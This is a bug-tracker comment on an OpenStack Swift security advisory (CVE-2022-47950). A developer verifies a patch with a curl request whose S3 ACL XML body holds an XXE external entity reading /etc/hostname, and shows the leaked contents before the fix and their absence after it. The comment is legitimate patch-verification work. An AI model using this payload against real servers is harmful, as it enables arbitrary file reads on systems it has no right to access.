OpenStack Security Advisory

  1. Bug #1998625
  2. Comment #28

Comment 28 for bug 1998625

Revision history for this message
Alistair Coles (alistair-coles) wrote : Re: Arbitrary file access through custom S3 XML entities (CVE-2022-47950)

Checked new version of patch attached here https://bugs.launchpad.net/swift/+bug/1998625/comments/23, looks ok.

Before patch:
```
vagrant@vagrant:~/swift$ swift-init restart proxy
Signal proxy-server pid: 223087 signal: Signals.SIGTERM
Signal proxy-server pid: 223088 signal: Signals.SIGTERM
proxy-server (223088) appears to have stopped
proxy-server (223087) appears to have stopped
WARNING: Unable to modify max process limit. Running as non-root?
Starting proxy-server...(/etc/swift/proxy-server/proxy-noauth.conf.d)
Starting proxy-server...(/etc/swift/proxy-server/proxy-server.conf.d)

vagrant@vagrant:~/swift$ curl 'http://saio3:8080/my-bucket?acl=' -X PUT -H "Host: saio3:8080" -H "Content-Type: application/x-www-form-urlencoded; charset=utf-8" -H "X-Amz-Content-Sha256: 4fd507f2889d8d42ee3e03fb20860748c0e5921dc345676d85fae0cc5891dfdf" -H "X-Amz-Date: 20230113T123756Z" -H "Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20230113/us-east-1/s3/aws4_request, SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date, Signature=054202b4db5e2d6e047f7abc6964555bb36538a265399bfdcff13bbe32c1e95b" --data-binary '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Owner>
    <DisplayName>test:tester</DisplayName>
    <ID>test:tester</ID>
</Owner>
<AccessControlList>
    <Grant>
        <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
            <DisplayName>foo &xxe;</DisplayName>
            <ID>foo &xxe;</ID>
        </Grantee>
        <Permission>WRITE</Permission>
    </Grant>
</AccessControlList>
</AccessControlPolicy>'

vagrant@vagrant:~/swift$ aws s3api get-bucket-acl --bucket my-bucket
{
    "Owner": {
        "DisplayName": "test:tester",
        "ID": "test:tester"
    },
    "Grants": [
        {
            "Grantee": {
                "DisplayName": "foo vagrant\n",
                "ID": "foo vagrant\n",
                "Type": "CanonicalUser"
            },
            "Permission": "WRITE"
        }
    ]
}
```

After patch:
```
vagrant@vagrant:~/swift$ swift-init restart proxy
Signal proxy-server pid: 223110 signal: Signals.SIGTERM
Signal proxy-server pid: 223111 signal: Signals.SIGTERM
proxy-server (223110) appears to have stopped
proxy-server (223111) appears to have stopped
WARNING: Unable to modify max process limit. Running as non-root?
Starting proxy-server...(/etc/swift/proxy-server/proxy-noauth.conf.d)
Starting proxy-server...(/etc/swift/proxy-server/proxy-server.conf.d)

vagrant@vagrant:~/swift$ curl 'http://saio3:8080/my-bucket?acl=' -X PUT -H "Host: saio3:8080" -H "Content-Type: application/x-www-form-urlencoded; charset=utf-8" -H "X-Amz-Content-Sha256: 4fd507f2889d8d42ee3e03fb20860748c0e5921dc345676d85fae0cc5891dfdf" -H "X-Amz-Date: 20230113T123756Z" -H "Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20230113/us-east-1/s3/aws4_request, SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date, Signature=054202b4db5e2d6e047f7abc6964555bb36538a265399bfdcff13bbe32c1e95b" --data-binary '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Owner>
    <DisplayName>test:tester</DisplayName>
    <ID>test:tester</ID>
</Owner>
<AccessControlList>
    <Grant>
        <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="CanonicalUser">
            <DisplayName>foo &xxe;</DisplayName>
            <ID>foo &xxe;</ID>
        </Grantee>
        <Permission>WRITE</Permission>
    </Grant>
</AccessControlList>
</AccessControlPolicy>'

vagrant@vagrant:~/swift$ aws s3api get-bucket-acl --bucket my-bucket
{
    "Owner": {
        "DisplayName": "test:tester",
        "ID": "test:tester"
    },
    "Grants": [
        {
            "Grantee": {
                "DisplayName": "foo ",
                "ID": "foo ",
                "Type": "CanonicalUser"
            },
            "Permission": "WRITE"
        }
    ]
}
```

Checked the unit tests fail if fix is reverted.

Unable to confirm the functional test due to something awry with boto on my vsaio (not specific to the new functional test).